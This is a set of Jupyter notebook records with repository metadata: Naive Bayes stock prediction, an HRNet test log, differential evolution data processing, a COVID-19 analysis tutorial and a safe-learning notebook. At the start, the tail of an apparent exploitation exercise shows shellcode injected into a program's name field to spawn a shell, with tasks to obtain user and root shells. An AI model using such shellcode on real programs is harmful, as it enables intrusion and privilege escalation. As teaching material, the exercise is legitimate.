Enter your choice [1-7]: \nChange user name\nEnter your new name:\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: �����������������������������������������������������������������1�1�1ə��j\n XQh//shh/bin��Q��S��]\n[You have 928410 credits] -> Enter your choice [1-7]: \n[DEBUG] current_game pointer 0x08050141\nls\nzsh: broken pipe cat lucky7_final_exploit.bin - | \nzsh: segmentation fault ./lucky7.exe\n\n```\n\n\n## Exercise\n- smuggle the shellcode into the name field, find it's address and exploit the program.\n- smuggle both user and root shells",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb29a38baf74f70cabb6d227f34618ba615f5091 | 31,875 | ipynb | Jupyter Notebook | Naive_Bayes_Classification.ipynb | sidn19/Stock-price-prediction | 05659f61b05cf708b74bb6aa2e08beaf1b752fd8 | [
"MIT"
] | null | null | null | Naive_Bayes_Classification.ipynb | sidn19/Stock-price-prediction | 05659f61b05cf708b74bb6aa2e08beaf1b752fd8 | [
"MIT"
] | null | null | null | Naive_Bayes_Classification.ipynb | sidn19/Stock-price-prediction | 05659f61b05cf708b74bb6aa2e08beaf1b752fd8 | [
"MIT"
] | null | null | null | 31.684891 | 3,842 | 0.293239 | [
[
[
"#import modules\nimport re\nimport nltk\nimport numpy as np\nimport pandas as pd\nfrom nltk.stem.porter import PorterStemmer\nfrom nltk.corpus import stopwords\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import metrics\nfrom sklearn.model_selection import RepeatedStratifiedKFold, GridSearchCV\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.decomposition import PCA",
"_____no_output_____"
],
[
"#import dataset\ndf = pd.read_csv(\"./Datasets/Combined_dataset.csv\", parse_dates=[\"Date\"], index_col=\"Date\")\ndf",
"_____no_output_____"
],
[
"df.info()",
"<class 'pandas.core.frame.DataFrame'>\nDatetimeIndex: 1595 entries, 2015-01-02 to 2021-06-04\nData columns (total 8 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 Headlines 1595 non-null object \n 1 Close/Last 1595 non-null float64\n 2 Volume 1595 non-null int64 \n 3 Open 1595 non-null float64\n 4 High 1595 non-null float64\n 5 Low 1595 non-null float64\n 6 Close_difference 1595 non-null float64\n 7 Impact 1595 non-null int64 \ndtypes: float64(5), int64(2), object(1)\nmemory usage: 112.1+ KB\n"
],
[
"#text cleaning\ncleaned_headlines = []\nps = PorterStemmer()\nfor i in range(0, len(df)):\n headlines = re.sub('[^a-zA-Z]', ' ', df['Headlines'][i])\n headlines = headlines.lower()\n headlines = headlines.split()\n headlines_stopwords = stopwords.words('english')\n headlines_stopwords.remove('not')\n headlines = [ps.stem(word) for word in headlines if not word in set(headlines_stopwords)]\n headlines = ' '.join(headlines)\n cleaned_headlines.append(headlines)\nlen(cleaned_headlines)",
"_____no_output_____"
],
[
"#vectorization\ncv = CountVectorizer()\nX = cv.fit_transform(cleaned_headlines).toarray()\nY = df.iloc[:, -1].values\nY",
"_____no_output_____"
],
[
"#split the data into train and test\nX_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size=0.2,random_state=0)",
"_____no_output_____"
],
[
"#create model\nnb_model = GaussianNB()\nnb_model.fit(X_train,Y_train)",
"_____no_output_____"
],
[
"#predict Y\nY_predict = nb_model.predict(X_test)",
"_____no_output_____"
],
[
"np.concatenate((Y_predict.reshape(len(Y_predict),1), Y_predict.reshape(len(Y_predict),1)),1)",
"_____no_output_____"
],
[
"#check confusion matrix and accuracy\nprint(metrics.confusion_matrix(Y_test, Y_predict))\nprint(metrics.accuracy_score(Y_test, Y_predict))",
"[[ 67 84]\n [ 68 100]]\n0.5235109717868338\n"
],
[
"##Hyperparameter Tuning",
"_____no_output_____"
],
[
"cv_method = RepeatedStratifiedKFold(n_splits=5, n_repeats=3, random_state=999)",
"_____no_output_____"
],
[
"params_NB = {'var_smoothing': np.logspace(0,-9, num=10)}\ngs_NB = GridSearchCV(estimator=nb_model, param_grid=params_NB, cv=cv_method, verbose=1, scoring='accuracy')\ngs_NB.fit(X, Y)\nresult = gs_NB.cv_results_",
"Fitting 15 folds for each of 10 candidates, totalling 150 fits\n"
],
[
"print(\"Tuned Logistic Regression Parameters: {}\".format(gs_NB.best_params_)) \nprint(\"Best score is {}\".format(gs_NB.best_score_))",
"Tuned Logistic Regression Parameters: {'var_smoothing': 1.0}\nBest score is 0.5251828631138976\n"
],
[
" pipe = Pipeline(steps=[\n ('pca', PCA()),\n ('estimator', GaussianNB()),\n ])\n \nparameters = {'estimator__var_smoothing': [1e-11, 1e-10, 1e-9]}\nBayes = GridSearchCV(pipe, parameters, scoring='accuracy', cv=10).fit(X, Y)\nprint(Bayes.best_estimator_)\nprint('best score: {}'.format(Bayes.best_score_))\npredictions = Bayes.best_estimator_.predict(X_test)",
"Pipeline(steps=[('pca', PCA()), ('estimator', GaussianNB(var_smoothing=1e-11))])\nbest score: 0.4815133647798742\n"
],
[
"np.concatenate((predictions.reshape(len(predictions),1), predictions.reshape(len(predictions),1)),1)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb29b3fcb5d2d917c70974c5d01486011b73b453 | 6,266 | ipynb | Jupyter Notebook | test.ipynb | HongJinSeong/COW_KEY_POINT_DETECTION | ea62ed875e9b8533f1c09b56eb8aefba94b1b906 | [
"MIT"
] | null | null | null | test.ipynb | HongJinSeong/COW_KEY_POINT_DETECTION | ea62ed875e9b8533f1c09b56eb8aefba94b1b906 | [
"MIT"
] | null | null | null | test.ipynb | HongJinSeong/COW_KEY_POINT_DETECTION | ea62ed875e9b8533f1c09b56eb8aefba94b1b906 | [
"MIT"
] | null | null | null | 34.618785 | 151 | 0.545164 | [
[
[
"!python tools/test.py --cfg experiments/coco/hrnet/w48_256x192_adam_lr1e-3.yaml",
"=> creating output/coco/pose_hrnet/w48_256x192_adam_lr1e-3\n=> creating log/coco/pose_hrnet/w48_256x192_adam_lr1e-3_2021-07-29-09-21\nNamespace(cfg='experiments/coco/hrnet/w48_256x192_adam_lr1e-3.yaml', dataDir='', logDir='', modelDir='', opts=[], prevModelDir='')\nAUTO_RESUME: False\nCUDNN:\n BENCHMARK: True\n DETERMINISTIC: False\n ENABLED: True\nDATASET:\n COLOR_RGB: True\n DATASET: coco\n DATA_FORMAT: jpg\n FLIP: False\n HYBRID_JOINTS_TYPE: \n NUM_JOINTS_HALF_BODY: 8\n PROB_HALF_BODY: 0.3\n ROOT: datasets/\n ROT_FACTOR: 45\n SCALE_FACTOR: 0.35\n SELECT_DATA: False\n TEST_SET: train\n TRAIN_PATH: train\n TRAIN_SET: train\nDATA_DIR: \nDEBUG:\n DEBUG: True\n SAVE_BATCH_IMAGES_GT: True\n SAVE_BATCH_IMAGES_PRED: True\n SAVE_HEATMAPS_GT: True\n SAVE_HEATMAPS_PRED: True\nGPUS: (0,)\nLOG_DIR: log\nLOSS:\n TOPK: 8\n USE_DIFFERENT_JOINTS_WEIGHT: False\n USE_OHKM: False\n USE_TARGET_WEIGHT: True\nMODEL:\n EXTRA:\n FINAL_CONV_KERNEL: 1\n PRETRAINED_LAYERS: ['conv1', 'bn1', 'conv2', 'bn2', 'layer1', 'transition1', 'stage2', 'transition2', 'stage3', 'transition3', 'stage4']\n STAGE2:\n BLOCK: BASIC\n FUSE_METHOD: SUM\n NUM_BLOCKS: [4, 4]\n NUM_BRANCHES: 2\n NUM_CHANNELS: [48, 96]\n NUM_MODULES: 1\n STAGE3:\n BLOCK: BASIC\n FUSE_METHOD: SUM\n NUM_BLOCKS: [4, 4, 4]\n NUM_BRANCHES: 3\n NUM_CHANNELS: [48, 96, 192]\n NUM_MODULES: 4\n STAGE4:\n BLOCK: BASIC\n FUSE_METHOD: SUM\n NUM_BLOCKS: [4, 4, 4, 4]\n NUM_BRANCHES: 4\n NUM_CHANNELS: [48, 96, 192, 384]\n NUM_MODULES: 3\n HEATMAP_SIZE: [48, 64]\n IMAGE_SIZE: [192, 256]\n INIT_WEIGHTS: True\n NAME: pose_hrnet\n NUM_JOINTS: 17\n PRETRAINED: pretrain_models/animal/hrnet_w48_animalpose_256x256-34644726_20210426.pth\n SIGMA: 2\n TAG_PER_JOINT: True\n TARGET_TYPE: gaussian\nOUTPUT_DIR: output\nPIN_MEMORY: True\nPRINT_FREQ: 100\nRANK: 0\nTEST:\n BATCH_SIZE_PER_GPU: 1\n BBOX_THRE: 1.0\n COCO_BBOX_FILE: data/coco/person_detection_results/COCO_val2017_detections_AP_H_56_person.json\n FLIP_TEST: False\n IMAGE_THRE: 0.0\n IN_VIS_THRE: 0.2\n MODEL_FILE: output/coco/pose_hrnet/w48_256x192_adam_lr1e-3/checkpoint.pth\n NMS_THRE: 1.0\n OKS_THRE: 0.9\n POST_PROCESS: True\n SHIFT_HEATMAP: True\n SOFT_NMS: False\n USE_GT_BBOX: True\nTRAIN:\n BATCH_SIZE_PER_GPU: 32\n BEGIN_EPOCH: 0\n CHECKPOINT: \n END_EPOCH: 210\n GAMMA1: 0.99\n GAMMA2: 0.0\n LR: 0.001\n LR_FACTOR: 0.1\n LR_STEP: [170, 200]\n MOMENTUM: 0.9\n NESTEROV: False\n OPTIMIZER: adam\n RESUME: False\n SHUFFLE: True\n WD: 0.0001\nWORKERS: 1\n=> loading model from output/coco/pose_hrnet/w48_256x192_adam_lr1e-3/checkpoint.pth\n=> classes: ['__background__', 'cow']\n=> num_images: 1000\nloading annotations into memory...\nTraceback (most recent call last):\n File \"tools/test.py\", line 126, in <module>\n main()\n File \"tools/test.py\", line 105, in main\n valid_dataset = eval('dataset.'+cfg.DATASET.DATASET)(\n File \"/root/HRNET/tools/../lib/dataset/coco.py\", line 131, in __init__\n self.db = self._get_db(self.data_ls)\n File \"/root/HRNET/tools/../lib/dataset/coco.py\", line 171, in _get_db\n gt_db = self._load_coco_keypoint_annotations(ls)\n File \"/root/HRNET/tools/../lib/dataset/coco.py\", line 183, in _load_coco_keypoint_annotations\n gt_db.extend(self._load_coco_keypoint_annotation_kernal(index))\n File \"/root/HRNET/tools/../lib/dataset/coco.py\", line 226, in _load_coco_keypoint_annotation_kernal\n im_ann = COCO(index)\n File \"/opt/conda/lib/python3.8/site-packages/pycocotools/coco.py\", line 85, in __init__\n dataset = json.load(f)\n File \"/opt/conda/lib/python3.8/json/__init__.py\", line 293, in load\n return loads(fp.read(),\n File \"/opt/conda/lib/python3.8/codecs.py\", line 322, in decode\n (result, consumed) = self._buffer_decode(data, self.errors, final)\nUnicodeDecodeError: 'utf-8' codec can't decode byte 0xff in position 0: invalid start byte\n"
]
]
] | [
"code"
] | [
[
"code"
]
] |
cb29b506cfffce07600c45f8f3d4a14b579ac15e | 9,464 | ipynb | Jupyter Notebook | process_f0.ipynb | Dvermetten/DE_TIOBR | b26d0624773d19e178c0eb33350d42356626e10c | [
"BSD-3-Clause"
] | null | null | null | process_f0.ipynb | Dvermetten/DE_TIOBR | b26d0624773d19e178c0eb33350d42356626e10c | [
"BSD-3-Clause"
] | null | null | null | process_f0.ipynb | Dvermetten/DE_TIOBR | b26d0624773d19e178c0eb33350d42356626e10c | [
"BSD-3-Clause"
] | null | null | null | 33.441696 | 149 | 0.516484 | [
[
[
"This notebook contains the code needed to process the data which tracks the POIS and diversity, as generated by the SOS framework\n\nBecause of the large size of these tables, not all in-between artifacts are provided\n\nThis code is part of the paper \"The Importance of Being Restrained\"",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pickle\nimport pandas as pd\nfrom functools import partial\nimport glob \n\nimport seaborn as sbs\nimport matplotlib.pyplot as plt\n\nfrom scipy.stats import kendalltau, rankdata\n\nfont = {'size' : 20}\n\nplt.rc('font', **font)",
"_____no_output_____"
],
[
"base_folder = \"/mnt/e/Research/DE/\" #Update to required folder",
"_____no_output_____"
],
[
"output_location = \"Datatables/\"",
"_____no_output_____"
],
[
"def get_merged_dt(cross, sdis, F, CR, popsize):\n dt_large = pd.DataFrame()\n files = glob.glob(f\"{base_folder}Runs_only/DEro{cross}{sdis}p{popsize}D30*F{F}Cr{CR}.txt\")\n for f in files:\n dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)\n dt_large = dt_large.append(dt_temp)\n dt_large['cross'] = cross\n dt_large['sdis'] = sdis\n dt_large['F'] = F\n dt_large['CR'] = CR\n dt_large['popsize'] = popsize\n return dt_large",
"_____no_output_____"
],
[
"def get_full_dt():\n dt_full = pd.DataFrame()\n for cross in ['b','e']:\n for sdis in ['c', 'h', 'm', 's', 't', 'u']:\n for CR in ['005', '099']:\n for F in ['0916', '005']:\n for popsize in [5,20,100]:\n dt_temp = get_merged_dt(cross, sdis, F, CR, popsize)\n dt_full = dt_full.append(dt_temp)\n return dt_full",
"_____no_output_____"
],
[
"def get_merged_dt_v2(cross, sdis, F, CR, popsize):\n dt_large = pd.DataFrame()\n files = glob.glob(f\"{base_folder}CosineSimilarity-MoreData/CosineSimilarity-MoreData/7/DEro{cross}{sdis}p{popsize}D30*F{F}Cr{CR}.txt\")\n if len(files) == 0:\n return dt_large\n for f in files:\n dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)\n dt_large = dt_large.append(dt_temp)\n dt_large['cross'] = cross\n dt_large['sdis'] = sdis\n dt_large['F'] = F\n dt_large['CR'] = CR\n dt_large['popsize'] = popsize\n dt_large.columns = ['cosine', 'applied', 'accept', 'cross', 'sdis', 'F', 'CR', 'popsize']\n return dt_large",
"_____no_output_____"
],
[
"for cross in ['b','e']:\n for sdis in ['c', 'h', 'm', 's', 't', 'u']:\n for CR in ['005','0285','052','0755','099']:\n for F in ['005','0285','052','0755','099']:\n for popsize in [5,20, 100]:\n dt = get_merged_dt_v2(cross, sdis, F, CR, popsize)\n dt.to_csv(f\"{output_location}DEro{cross}_{sdis}_p{popsize}_F{F}CR{CR}_cosine.csv\")",
"_____no_output_____"
],
[
"def get_merged_dt_v3(sdis, F, CR, popsize):\n dt_large = pd.DataFrame()\n files = glob.glob(f\"{base_folder}CosineSimilarity-LookingCloser/7/DErob{sdis}p{popsize}D30*F{F}Cr{CR}.txt\")\n if len(files) == 0:\n return dt_large\n for f in files:\n dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)\n dt_large = dt_large.append(dt_temp)\n dt_large['sdis'] = sdis\n dt_large['F'] = F\n dt_large['CR'] = CR\n dt_large['popsize'] = popsize\n dt_large.columns = ['cosine', 'nr_mut', 'nr_exceed', 'accept', 'sdis', 'F', 'CR', 'popsize']\n return dt_large",
"_____no_output_____"
],
[
"for sdis in ['c', 'h', 'm', 's', 't', 'u']:\n for popsize in [5, 20, 100]:\n for idx_0, F in enumerate(['099','0755','052','0285','005']):\n for idx_1, CR in enumerate(['0041','0081','0121','0161','0201']):\n dt = get_merged_dt_v3(sdis, F, CR, popsize)\n dt.to_csv(f\"{output_location}DE_{sdis}_p{popsize}_F{F}CR{CR}_cosine_v3.csv\")",
"_____no_output_____"
],
[
"def get_merged_dt_v4(sdis, F, CR, popsize):\n dt_large = pd.DataFrame()\n files = glob.glob(f\"{base_folder}Div_cos_sim/CosineSimilarity/7/DErob{sdis}p{popsize}D30f0*_F{F}Cr{CR}.txt\")\n if len(files) == 0:\n return dt_large\n for f in files:\n dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)\n dt_large = dt_large.append(dt_temp)\n dt_large['sdis'] = sdis\n dt_large['F'] = F\n dt_large['CR'] = CR\n dt_large['popsize'] = popsize\n dt_large.columns = ['cosine', 'nr_mut', 'nr_exceed', 'accept', 'sdis', 'F', 'CR', 'popsize']\n return dt_large",
"_____no_output_____"
],
[
"for F in ['0285', '099', '052', '005']: #'0755', \n for CR in ['0755', '0285', '099', '052', '005', '00891', '01283', '01675', '02067', '02458']:\n for popsize in [5, 20, 100]:\n for sdis in ['t', 'h', 'm', 's', 'c', 'u']:\n dt = get_merged_dt_v4(sdis, F, CR, popsize)\n dt.to_csv(f\"{output_location}DE_{sdis}_p{popsize}_F{F}CR{CR}_cosine_v4.csv\")",
"_____no_output_____"
],
[
"def get_diversity_dt(sdis, F, CR, popsize):\n dt_large = pd.DataFrame()\n files = glob.glob(f\"/mnt/e/Research/DE/Div_cos_sim/CosineSimilarity/7/Diversity-DErob{sdis}p{popsize}D30f0*_F{F}Cr{CR}.txt\")\n if len(files) == 0:\n return dt_large\n for f in files:\n dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)\n dt_large = dt_large.append(dt_temp)\n dt_large['sdis'] = sdis\n dt_large['F'] = F\n dt_large['CR'] = CR\n dt_large['popsize'] = popsize\n dt_large.columns = ['div0', 'div1', 'sdis', 'F', 'CR', 'popsize']\n return dt_large",
"_____no_output_____"
],
[
"for F in ['0755','0285', '099', '052', '005']: \n for CR in ['0755', '0285', '099', '052', '005', '00891', '01283', '01675', '02067', '02458']:\n for popsize in [5, 20, 100]:\n for sdis in ['t', 'h', 'm', 's', 'c', 'u']:\n dt = get_diversity_dt(sdis, F, CR, popsize)\n dt.to_csv(f\"{output_location}DE_{sdis}_p{popsize}_F{F}CR{CR}_diversity.csv\")",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb29bca2366386726c89e84e8a908abf1737815c | 402,359 | ipynb | Jupyter Notebook | Coursera-Project-Network/COVID19-Data-Analysis-Using-Python/covid19-data-analysis-notebook.ipynb | fengjings/Coursera | 54098a9732faa4b37afe69d196e27805b1ac73aa | [
"MIT"
] | null | null | null | Coursera-Project-Network/COVID19-Data-Analysis-Using-Python/covid19-data-analysis-notebook.ipynb | fengjings/Coursera | 54098a9732faa4b37afe69d196e27805b1ac73aa | [
"MIT"
] | null | null | null | Coursera-Project-Network/COVID19-Data-Analysis-Using-Python/covid19-data-analysis-notebook.ipynb | fengjings/Coursera | 54098a9732faa4b37afe69d196e27805b1ac73aa | [
"MIT"
] | 1 | 2021-06-09T08:59:48.000Z | 2021-06-09T08:59:48.000Z | 102.225356 | 24,928 | 0.768948 | [
[
[
"# Welcome to Covid19 Data Analysis Notebook\n------------------------------------------",
"_____no_output_____"
],
[
"### Let's Import the modules ",
"_____no_output_____"
]
],
[
[
"import pandas as pd \nimport numpy as np \nimport seaborn as sns\nimport matplotlib.pyplot as plt \n",
"_____no_output_____"
]
],
[
[
"## Task 2 ",
"_____no_output_____"
],
[
"### Task 2.1: importing covid19 dataset\nimporting \"Covid19_Confirmed_dataset.csv\" from \"./Dataset\" folder. \n",
"_____no_output_____"
]
],
[
[
"corona_dataset_csv = pd.read_csv('Datasets/covid19_Confirmed_dataset.csv')\ncorona_dataset_csv.head()",
"_____no_output_____"
]
],
[
[
"#### Let's check the shape of the dataframe",
"_____no_output_____"
]
],
[
[
"corona_dataset_csv.shape",
"_____no_output_____"
]
],
[
[
"### Task 2.2: Delete the useless columns",
"_____no_output_____"
]
],
[
[
"df = corona_dataset_csv.drop(['Lat','Long'],axis = 1)\ndf.head()",
"_____no_output_____"
],
[
"# if we want to change original file:\ncorona_dataset_csv = pd.read_csv('Datasets/covid19_Confirmed_dataset.csv')\ncorona_dataset_csv.drop(['Lat','Long'],axis=1,inplace=True)\ncorona_dataset_csv.head(10)",
"_____no_output_____"
]
],
[
[
"### Task 2.3: Aggregating the rows by the country",
"_____no_output_____"
]
],
[
[
"corona_dataset_aggregated = corona_dataset_csv.groupby(\"Country/Region\").sum()\ncorona_dataset_aggregated.head(10)",
"_____no_output_____"
],
[
"corona_dataset_aggregated.shape",
"_____no_output_____"
]
],
[
[
"### Task 2.4: Visualizing data related to a country for example China\nvisualization always helps for better understanding of our data.",
"_____no_output_____"
]
],
[
[
"corona_dataset_aggregated.loc['China']",
"_____no_output_____"
],
[
"corona_dataset_aggregated.loc['China'].plot() # locate\ncorona_dataset_aggregated.loc['Italy'].plot()\ncorona_dataset_aggregated.loc['US'].plot()\nplt.legend()",
"_____no_output_____"
]
],
[
[
"### Task3: Calculating a good measure \nwe need to find a good measure reperestend as a number, describing the spread of the virus in a country. ",
"_____no_output_____"
]
],
[
[
"corona_dataset_aggregated.loc['China'].plot()",
"_____no_output_____"
],
[
"corona_dataset_aggregated.loc['China'][:5].plot()",
"_____no_output_____"
],
[
"corona_dataset_aggregated.loc['China'].diff().plot()",
"_____no_output_____"
]
],
[
[
"### task 3.1: caculating the first derivative of the curve",
"_____no_output_____"
]
],
[
[
"corona_dataset_aggregated.loc['China'].diff().plot()",
"_____no_output_____"
]
],
[
[
"### task 3.2: find maxmimum infection rate for China",
"_____no_output_____"
]
],
[
[
"corona_dataset_aggregated.loc['China'].diff().max()",
"_____no_output_____"
],
[
"corona_dataset_aggregated.loc['China'].diff().argmax()",
"C:\\ProgramData\\Anaconda3\\lib\\site-packages\\ipykernel_launcher.py:1: FutureWarning: \nThe current behaviour of 'Series.argmax' is deprecated, use 'idxmax'\ninstead.\nThe behavior of 'argmax' will be corrected to return the positional\nmaximum in the future. For now, use 'series.values.argmax' or\n'np.argmax(np.array(values))' to get the position of the maximum\nrow.\n \"\"\"Entry point for launching an IPython kernel.\n"
],
[
"corona_dataset_aggregated.loc['China'].diff().idxmax()",
"_____no_output_____"
]
],
[
[
"### Task 3.3: find maximum infection rate for all of the countries. ",
"_____no_output_____"
]
],
[
[
"corona_dataset_aggregated = corona_dataset_csv.groupby(\"Country/Region\").sum()\ncountries = list(corona_dataset_aggregated.index)\nmax_infection_number = []\nmax_infection_date = []\nfor country in countries :\n max_infection_number.append(corona_dataset_aggregated.loc[country].diff().max())\n max_infection_date.append(corona_dataset_aggregated.loc[country].diff().idxmax())\ncorona_dataset_aggregated['max_infection_number'] = max_infection_number\ncorona_dataset_aggregated['max_infection_date'] = max_infection_date\ncorona_dataset_aggregated.head()",
"_____no_output_____"
]
],
[
[
"### Task 3.4: create a new dataframe with only needed column ",
"_____no_output_____"
]
],
[
[
"corona_data = pd.DataFrame(corona_dataset_aggregated['max_infection_number'])\ncorona_data.head()",
"_____no_output_____"
]
],
[
[
"### Task4: \n- Importing the WorldHappinessReport.csv dataset\n- selecting needed columns for our analysis \n- join the datasets \n- calculate the correlations as the result of our analysis",
"_____no_output_____"
],
[
"### Task 4.1 : importing the dataset",
"_____no_output_____"
]
],
[
[
"world_happiness_report = pd.read_csv(\"Datasets/worldwide_happiness_report.csv\")\nworld_happiness_report.head(20)",
"_____no_output_____"
],
[
"world_happiness_report.shape",
"_____no_output_____"
]
],
[
[
"### Task 4.2: let's drop the useless columns ",
"_____no_output_____"
]
],
[
[
"world_happiness_report = pd.read_csv(\"Datasets/worldwide_happiness_report.csv\")\ncolumns_to_dropped = ['Overall rank','Score','Generosity','Perceptions of corruption']\nworld_happiness_report.drop(columns_to_dropped,axis=1 , inplace=True)\nworld_happiness_report.head()",
"_____no_output_____"
]
],
[
[
"### Task 4.3: changing the indices of the dataframe",
"_____no_output_____"
]
],
[
[
"# change index by name\nworld_happiness_report.set_index(['Country or region'],inplace=True)\nworld_happiness_report.head()",
"_____no_output_____"
]
],
[
[
"### Task4.4: now let's join two dataset we have prepared ",
"_____no_output_____"
],
[
"#### Corona Dataset :",
"_____no_output_____"
]
],
[
[
"corona_data.head()",
"_____no_output_____"
],
[
"corona_data.shape",
"_____no_output_____"
]
],
[
[
"#### wolrd happiness report Dataset :",
"_____no_output_____"
]
],
[
[
"world_happiness_report.head()",
"_____no_output_____"
],
[
"world_happiness_report.shape",
"_____no_output_____"
],
[
"data1 =corona_data.join(world_happiness_report)\nprint(data1.shape)\ndata1.head()",
"(187, 5)\n"
],
[
"data2 =corona_data.join(world_happiness_report, how='inner')# delete some countries not in happiness csv\nprint(data2.shape)\ndata2.head()",
"(143, 5)\n"
],
[
"# add corona data in happiness, if one country in corona but not in happiness,then don't add it.\ndata3 = world_happiness_report.join(corona_data).copy()\nprint(data3.shape)\ndata3.head()",
"(156, 5)\n"
]
],
[
[
"### Task 4.5: correlation matrix ",
"_____no_output_____"
]
],
[
[
"data1.corr()",
"_____no_output_____"
],
[
"data2.corr()",
"_____no_output_____"
],
[
"data3.corr()",
"_____no_output_____"
]
],
[
[
"### Task 5: Visualization of the results\nour Analysis is not finished unless we visualize the results in terms figures and graphs so that everyone can understand what you get out of our analysis",
"_____no_output_____"
]
],
[
[
"print(data2.shape)\ndata2.head()",
"(143, 5)\n"
]
],
[
[
"### Task 5.1: Plotting GDP vs maximum Infection rate",
"_____no_output_____"
]
],
[
[
"x = data2['GDP per capita']\ny = data2['max_infection_number']\nplt.figure()\nsns.scatterplot(x,(y))# 散点图\nplt.figure()\nsns.scatterplot(x,np.log(y))# 散点图",
"_____no_output_____"
],
[
"sns.regplot(x,np.log(y))",
"_____no_output_____"
]
],
[
[
"### Task 5.2: Plotting Social support vs maximum Infection rate",
"_____no_output_____"
]
],
[
[
"x = data2['Social support']\ny = data2['max_infection_number']\nplt.figure()\nsns.scatterplot(x,(y))# 散点图\nplt.figure()\nsns.scatterplot(x,np.log(y))# 散点图\nplt.figure()\nsns.regplot(x,np.log(y))",
"_____no_output_____"
]
],
[
[
"### Task 5.3: Plotting Healthy life expectancy vs maximum Infection rate",
"_____no_output_____"
]
],
[
[
"x = data2['Healthy life expectancy']\ny = data2['max_infection_number']\nplt.figure()\nsns.scatterplot(x,(y))# 散点图\nplt.figure()\nsns.scatterplot(x,np.log(y))# 散点图\nplt.figure()\nsns.regplot(x,np.log(y))",
"_____no_output_____"
]
],
[
[
"### Task 5.4: Plotting Freedom to make life choices vs maximum Infection rate",
"_____no_output_____"
]
],
[
[
"x = data2['Freedom to make life choices']\ny = data2['max_infection_number']\nplt.figure()\nsns.scatterplot(x,(y))# 散点图\nplt.figure()\nsns.scatterplot(x,np.log(y))# 散点图\nplt.figure()\nsns.regplot(x,np.log(y))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2a21aeedc9f7e1893c4b05324253cdb2db58d5 | 9,701 | ipynb | Jupyter Notebook | experiments/1d_region_of_attraction_estimate.ipynb | xin-alice/cs159_safe_learning | 44761774c38cec36f156b2978b5eb5ec1ca712e9 | [
"MIT"
] | null | null | null | experiments/1d_region_of_attraction_estimate.ipynb | xin-alice/cs159_safe_learning | 44761774c38cec36f156b2978b5eb5ec1ca712e9 | [
"MIT"
] | null | null | null | experiments/1d_region_of_attraction_estimate.ipynb | xin-alice/cs159_safe_learning | 44761774c38cec36f156b2978b5eb5ec1ca712e9 | [
"MIT"
] | null | null | null | 30.127329 | 238 | 0.557881 | [
[
[
"# Stability verification of a fixed uncertain system (without dynamic programming)",
"_____no_output_____"
]
],
[
[
"from __future__ import division, print_function\n\nimport tensorflow as tf\nimport gpflow\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom future.builtins import *\nfrom functools import partial\n%matplotlib inline\n\nimport plotting\nimport safe_learning\n\ntry:\n session.close()\nexcept NameError:\n pass\n\ngraph = tf.Graph()\nsession = tf.InteractiveSession(graph=graph)\nsession.run(tf.global_variables_initializer())",
"_____no_output_____"
]
],
[
[
"We start by defining a discretization of the space $[-1, 1]$ with discretization constant $\\tau$",
"_____no_output_____"
]
],
[
[
"discretization = safe_learning.GridWorld([-1, 1], 1001)\ntau = 1 / discretization.nindex\n\nprint('Grid size: {0}'.format(discretization.nindex))",
"_____no_output_____"
]
],
[
[
